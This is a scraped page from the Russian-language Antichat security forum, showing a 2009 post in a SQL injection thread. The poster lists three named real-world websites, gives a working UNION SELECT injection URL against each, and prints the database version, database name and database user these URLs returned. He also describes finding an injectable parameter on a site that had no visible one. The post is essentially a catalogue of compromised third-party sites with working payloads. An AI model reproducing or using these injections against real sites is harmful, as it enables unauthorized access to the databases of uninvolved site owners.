Форум АНТИЧАТ - SQL Инъекции

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

27.03.2009, 13:05

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

http://www.karcherbg.com/newsview.php?id=-21+union+select+1,concat_ws(0x3a,version(),databas e(),useR()),3,4,5,6

Database Version: 5.0.67-community
Database name: karcherb_karcher
User name: karcherb_site@localhost

http://www.nmkconsult.com/services_details.php?id=-3+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5

Database Version: 5.0.67-community
Database name: nmkconsu_NMKCONSULT
User name: nmkconsu_site@localhost

Интересное дело, так как на сайте не было динамического параметра типа id= , я нашел вкладку новостей, но там всего лишь одна новость поэтому выглядело просто news.php , подтставил news.php?id=1 а дальше уже по класической схеме раскрутил скулю.

http://www.ekip6.net/bg/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5,6,7,8,9

Database Version: 5.0.67-community-log
Database name: ekip6ne_Ekip6
User name: ekip6ne_site@localhost

Последний раз редактировалось Gorev; 27.03.2009 в 13:15..